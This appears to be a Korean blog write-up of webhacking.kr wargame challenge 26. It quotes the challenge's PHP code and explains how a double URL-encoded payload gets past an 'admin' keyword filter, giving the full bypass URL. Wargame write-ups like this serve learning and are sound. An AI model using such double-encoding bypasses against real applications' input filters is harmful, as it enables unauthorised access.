webhacking.kr 26 url encoding

URL encoding table

http://www.w3schools.com/tags/ref_urlencode.asp

<html> 
<head> 
<title>Challenge 26</title> 
<style type="text/css"> 
body { background:black; color:white; font-size:10pt; }     
a { color:lightgreen; } 
</style> 
</head> 
<body> 

<? 

if(eregi("admin",$_GET[id])) { echo("<p>no!"); exit(); } 

$_GET[id]=urldecode($_GET[id]); 

if($_GET[id]=="admin") 
{ 
@solve(26,100); 
} 

?> 


<br><br> 
<a href=index.phps>index.phps</a> 
</body> 
</html>

$_GET[id] : GET method(url을 통한 방법)로 id라는 매개변수에 보내준 데이터

eregi : 문자열 비교 함수

http://webhacking.kr/challenge/web/web-11/index.php?id=%2561%2564%256D%2569%256E

의 형태로 id의 값을 보내준다 = GET 메소드

url을 통해 서버로 인자를 보낼 때 기본적으로 url디코딩을 한다

따라서 %61%64%6D%69%6E 을 보내주면 $_GET[id] = "admin"이 된다

그러므로 두 번 인코딩 해준다 -> 숫자와 알파벳은 디코딩을 안하기 때문에 %만 인코딩 해주면 된다

http://webhacking.kr/challenge/web/web-11/index.php?id=%2561%2564%256D%2569%256E

인자를 보내줄 때는 phps 파일이 아닌 php 파일에 보내줘야 한다